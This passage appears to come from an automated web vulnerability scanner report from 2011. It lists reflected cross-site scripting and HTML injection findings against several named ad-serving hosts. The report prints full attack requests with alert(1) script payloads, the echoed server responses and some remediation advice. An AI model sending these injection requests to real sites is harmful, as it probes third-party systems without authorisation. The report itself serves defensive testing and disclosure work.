Referer: http://2754.btrll.com/if/2754/5700/300x250.318;IBAutoPreview;1309225828?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGVTstugzAQ%2EBtOCGwMpBShyiTQUEEd1ESkXBAYE4PCQ4Y2KF%2DftkHtuXuZndHs7EBka7lpFpaO9AoChnLDhgiUqAIUMk0Gtm2vkGkhzQJQHgO3xP4n2eIN3R0v%2DGe8Kg7i%2D4pP7gHj4E52D9%2D49o8RCRcrij2yOMf0bREX4Z8QW9xbTr7%2DLVE63V7AFbu%2EWc9pS5KUkyQCYeLNUXOaor1%2EjtawTpvgEiZ%2Dne49nWxe%2DGtzQO9%2ElRxZ5tM0PKpqqUwiL9ms9APrZoX2rZpXQhn48CRYJdjIHR1I175jdekYBlxJtHDqbmRiykTelX2bdR9twUTGmWDSuafODTaSb8o%3D%2C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VGWhBwAY9juTqHu_QBj2HROVkeDAGPYxU6h7v0AY9i_TqHu_QBj3E5RyIdJAGPYOk5wj4AAY90ATgjwXwBj2vlOdUwz; BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck

Response

HTTP/1.0 404 Not Found
Date: Tue, 28 Jun 2011 01:50:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Tue, 26-Jun-2012 01:50:33 GMT; path=/; domain=.btrll.com
Content-Length: 144
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
No 'launch' method on bluekai59bf0<a>25fe0888b3c.</body>
</html>

1.323. http://segs.btrll.com/partner/bluekai/tpix [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://segs.btrll.com
Path:   /partner/bluekai/tpix

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3bf3<a>d3bf15a0bce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /partner/bluekai/tpixa3bf3<a>d3bf15a0bce?p=12329|12330|12334|14821|14832|14840|14856|25215|25253|25320|25324|26353|26354|26355|30737|30961|32177|32748|32833|33636|34131|54914|54938|72613|72614|72627|73261|120425|120439|120449|123914|123918|129719|129721 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://2754.btrll.com/if/2754/5700/300x250.318;IBAutoPreview;1309225828?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGVTstugzAQ%2EBtOCGwMpBShyiTQUEEd1ESkXBAYE4PCQ4Y2KF%2DftkHtuXuZndHs7EBka7lpFpaO9AoChnLDhgiUqAIUMk0Gtm2vkGkhzQJQHgO3xP4n2eIN3R0v%2DGe8Kg7i%2D4pP7gHj4E52D9%2D49o8RCRcrij2yOMf0bREX4Z8QW9xbTr7%2DLVE63V7AFbu%2EWc9pS5KUkyQCYeLNUXOaor1%2EjtawTpvgEiZ%2Dne49nWxe%2DGtzQO9%2ElRxZ5tM0PKpqqUwiL9ms9APrZoX2rZpXQhn48CRYJdjIHR1I175jdekYBlxJtHDqbmRiykTelX2bdR9twUTGmWDSuafODTaSb8o%3D%2C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VGWhBwAY9juTqHu_QBj2HROVkeDAGPYxU6h7v0AY9i_TqHu_QBj3E5RyIdJAGPYOk5wj4AAY90ATgjwXwBj2vlOdUwz; BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck

Response

HTTP/1.0 404 Not Found
Date: Tue, 28 Jun 2011 01:50:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Tue, 26-Jun-2012 01:50:34 GMT; path=/; domain=.btrll.com
Content-Length: 141
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
No 'launch' method on tpixa3bf3<a>d3bf15a0bce.</body>
</html>

1.324. http://serve.directdigitalllc.com/serve.php [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbfb"><script>alert(1)</script>d9b5177209b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=49&t202id=44851&click=http://yads.zedo.com/ads2/c%3Fa%3D919391%3Bx%3D2304%3Bg%3D172%3Bc%3D1197000069%2C1197000069%3Bi%3D0%3Bn%3D1197%3Bi%3D0%3Bu%3DlYrOTcGt89Yz1ao6zwEmLiof%7E051411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D12%3Bg%3D172%3Bw%3D51%3Bm%3D34%3Bz%3D0.600777423940599%3Bp%3D6%3Bf%3D1126761%3Bh%3D840708%3Bk=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b34/f/b7/%252a/v%253B239249367%253B0-0%253B0%253B62163710%253B4307-300/250%253B41389676/41407463/1%253Bu%253D17934268%253B%257Esscs%253D%253fhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D9bb7df84-bb38-4713-9a7d-6ada3da6c2a1%26_o%3D17375062%26_eo%3D97956%26_et%3D1309227390%26_a%3D17396832%26_s%3D11683%26_d%3D17933581%26_c%3D17383508%26_pm%3D97956%26_pn%3D17934268%26redirect%3D%26z%3D37610171fbfb"><script>alert(1)</script>d9b5177209b HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1197;c=69/68;s=12;d=9;w=300;h=250;l=http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b7/%2a/v%3B239249367%3B0-0%3B0%3B62163710%3B4307-300/250%3B41389676/41407463/1%3Bu%3D17934268%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=9bb7df84-bb38-4713-9a7d-6ada3da6c2a1&_o=17375062&_eo=97956&_et=1309227390&_a=17396832&_s=11683&_d=17933581&_c=17383508&_pm=97956&_pn=17934268&redirect=&z=3761017
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:17:23 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Content-Length: 12018
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
cs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=9bb7df84-bb38-4713-9a7d-6ada3da6c2a1&_o=17375062&_eo=97956&_et=1309227390&_a=17396832&_s=11683&_d=17933581&_c=17383508&_pm=97956&_pn=17934268&redirect=&z=37610171fbfb"><script>alert(1)</script>d9b5177209bhttps://crm.directdigitalllc.com/click?a=85&b=49&p=85%2C1%2C17">
...[SNIP]...

1.325. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bf7"><script>alert(1)</script>d2a913e020f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=49&t202id=44851&click=http://yads.zedo.com/ads2/c%3Fa%3D919391%3Bx%3D2304%3Bg%3D172%3Bc%3D1197000069%2C1197000069%3Bi%3D0%3Bn%3D1197%3Bi%3D0%3Bu%3DlYrOTcGt89Yz1ao6zwEmLiof%7E051411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D12%3Bg%3D172%3Bw%3D51%3Bm%3D34%3Bz%3D0.600777423940599%3Bp%3D6%3Bf%3D1126761%3Bh%3D840708%3Bk=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b34/f/b7/%252a/v%253B239249367%253B0-0%253B0%253B62163710%253B4307-300/250%253B41389676/41407463/1%253Bu%253D17934268%253B%257Esscs%253D%253fhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D9bb7df84-bb38-4713-9a7d-6ada3da6c2a1%26_o%3D17375062%26_eo%3D97956%26_et%3D1309227390%26_a%3D17396832%26_s%3D11683%26_d%3D17933581%26_c%3D17383508%26_pm%3D97956%26_pn%3D17934268%26redirect%3D%26z%3D376/58bf7"><script>alert(1)</script>d2a913e020f1017 HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1197;c=69/68;s=12;d=9;w=300;h=250;l=http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b7/%2a/v%3B239249367%3B0-0%3B0%3B62163710%3B4307-300/250%3B41389676/41407463/1%3Bu%3D17934268%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=9bb7df84-bb38-4713-9a7d-6ada3da6c2a1&_o=17375062&_eo=97956&_et=1309227390&_a=17396832&_s=11683&_d=17933581&_c=17383508&_pm=97956&_pn=17934268&redirect=&z=3761017
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:17:48 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Content-Length: 12022
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=9bb7df84-bb38-4713-9a7d-6ada3da6c2a1&_o=17375062&_eo=97956&_et=1309227390&_a=17396832&_s=11683&_d=17933581&_c=17383508&_pm=97956&_pn=17934268&redirect=&z=376/58bf7"><script>alert(1)</script>d2a913e020f1017https://crm.directdigitalllc.com/click?a=1&b=49&p=1%2C17%2C75">
...[SNIP]...

1.326. http://servedby.flashtalking.com/imp/3/16303 [136713;201;js;AkamaiUS;InMarketShoppers300x250/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The value of the 136713;201;js;AkamaiUS;InMarketShoppers300x250/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 710e9"-alert(1)-"c46b5e33968 was submitted in the 136713;201;js;AkamaiUS;InMarketShoppers300x250/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D710e9"-alert(1)-"c46b5e33968&ftx=&fty=&ftadz=&ftscw=&cachebuster=51961.401011794806 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:00:56 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1085
content-type: text/javascript
Via: 1.1 rhv061005 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D710e9"-alert(1)-"c46b5e33968&ftx=&fty=&ftadz=&ftscw=&cachebuster=51961.401011794806";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src
...[SNIP]...

1.327. http://servedby.flashtalking.com/imp/3/16303 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c5d1"-alert(1)-"eb548217a31 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=&ftscw=&cachebuster=51961.4010117948062c5d1"-alert(1)-"eb548217a31 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:02:15 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 1085
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 rhv192175010000 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=&ftscw=&cachebuster=51961.4010117948062c5d1"-alert(1)-"eb548217a31";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/13/136713/211602/js/j
...[SNIP]...

1.328. http://servedby.flashtalking.com/imp/3/16303 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14359"-alert(1)-"f583dc99212 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=14359"-alert(1)-"f583dc99212&ftscw=&cachebuster=51961.401011794806 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:01:47 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 1085
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 rhv061005 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=14359"-alert(1)-"f583dc99212&ftscw=&cachebuster=51961.401011794806";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src="http://cdn.flas
...[SNIP]...

1.329. http://servedby.flashtalking.com/imp/3/16303 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba893"-alert(1)-"034d86ca01a was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=&ftscw=ba893"-alert(1)-"034d86ca01a&cachebuster=51961.401011794806 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:02:01 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
